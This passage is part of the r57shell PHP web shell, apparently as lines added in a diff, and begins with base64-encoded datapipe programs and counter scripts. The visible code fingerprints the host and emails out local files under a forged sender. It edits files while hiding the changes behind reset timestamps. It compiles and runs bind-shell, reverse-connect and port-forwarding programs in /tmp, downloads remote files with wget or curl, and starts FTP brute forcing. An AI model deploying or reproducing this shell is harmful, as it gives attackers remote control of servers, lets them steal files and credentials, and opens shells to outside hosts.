+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+$f = '<br>';
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n");
+ mr($language,$res);
+ $_POST['cmd']="";
+ }
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {
+ if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; }
+ else
+  {
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    mr($language,$res);
+    $_POST['cmd']="";
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { fe($language,0); }
+ else
+  {
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
+  else
+   {
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
